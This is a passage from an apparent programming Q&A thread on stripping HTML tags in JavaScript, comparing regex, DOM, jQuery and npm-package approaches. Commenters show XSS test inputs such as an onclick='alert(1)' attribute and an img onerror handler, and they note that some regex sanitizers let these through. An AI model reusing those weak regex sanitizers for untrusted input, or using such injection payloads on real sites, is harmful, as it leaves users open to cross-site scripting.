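console.log(stripOnce(nested));
console.log(stripUntilStable(nested));
```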

Alexis Wilke Over a year ago

You should change the [^<>] with [^>] because a valid tag cannot include a < character, then the XSS vulnerability disappears.

aWebDeveloper · Accepted Answer · 2015-07-14 12:56:53Z

2

The code below allows you to retain some HTML tags while stripping all others:

function strip_tags(input, allowed) {

  allowed = (((allowed || '') + '')
    .toLowerCase()
    .match(/<[a-z][a-z0-9]*>/g) || [])
    .join(''); // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)

  var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
      commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;

  return input.replace(commentsAndPhpTags, '')
      .replace(tags, function($0, $1) {
          return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
      });
}
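
One thing to keep in mind with the allowed parameter is that allowed tags pass through with all of their attributes, including event handlers such as onclick. A possible variation, sketched below, rebuilds each allowed tag from its name alone so that attributes are dropped. The function name stripTagsDropAttributes and its array-based allowedNames parameter are assumptions made for this example and are not part of the code above.

```javascript
// Hypothetical variant: allowed tags are kept, but re-emitted without attributes.
function stripTagsDropAttributes(input, allowedNames) {
  var allowed = (allowedNames || []).map(function (name) {
    return name.toLowerCase();
  });
  var tags = /<(\/?)([a-z][a-z0-9]*)\b[^>]*>/gi;
  var comments = /<!--[\s\S]*?-->/g;

  return input.replace(comments, "").replace(tags, function (match, slash, name) {
    var lower = name.toLowerCase();
    // Rebuild the tag from its name only, e.g. <p onclick="..."> becomes <p>.
    return allowed.indexOf(lower) > -1 ? "<" + slash + lower + ">" : "";
  });
}

console.log(stripTagsDropAttributes('<p onclick="alert(1)">mytext</p><i>x</i>', ["p"]));
```

This is still regex-based, so a ">" inside a quoted attribute value will cut the match short and leave the rest of the attribute behind as text. For untrusted input, a maintained sanitizer remains the safer route.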

answered Jul 14, 2015 at 12:56

aWebDeveloper

1 Comment

Chris Cinelli Over a year ago

You should quote the source (phpjs). If you use the allowed param you are vulnerable to XSS: stripTags('<p onclick="alert(1)">mytext</p>', '<p>') returns <p onclick="alert(1)">mytext</p>

basarat · Accepted Answer · 2016-05-27 00:12:48Z

2

The accepted answer works fine mostly; however, in IE, if the html string is null you get "null" (instead of ''). Fixed:

function strip(html)
{
   if (html == null) return "";
   var tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

answered May 27, 2016 at 0:12

basarat

Community · Accepted Answer · 2020-06-20 09:12:55Z

2

A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.

function stripHtml(unsafe) {
    return $($.parseHTML(unsafe)).text();
}

Can safely strip html from:

<img src="unknown.gif" onerror="console.log('running injections');">

And other exploits.

nJoy!

edited Jun 20, 2020 at 9:12

CommunityBot

answered Mar 25, 2019 at 20:44

nickl-

jnaklaas · Accepted Answer · 2021-07-05 09:31:20Z

2

If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.

import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one

striptags('<p>An HTML string</p>');

answered Jul 5, 2021 at 9:31

jnaklaas

Bitdom8 · Accepted Answer · 2022-04-16 10:26:06Z

2

const strip=(text) =>{
    return (new DOMParser()?.parseFromString(text,"text/html"))
    ?.body?.textContent
}

const value=document.getElementById("idOfEl").value

const cleanText=strip(value)

edited Apr 16, 2022 at 10:26

Bitdom8

answered Jan 19, 2022 at 8:53

Yilmaz
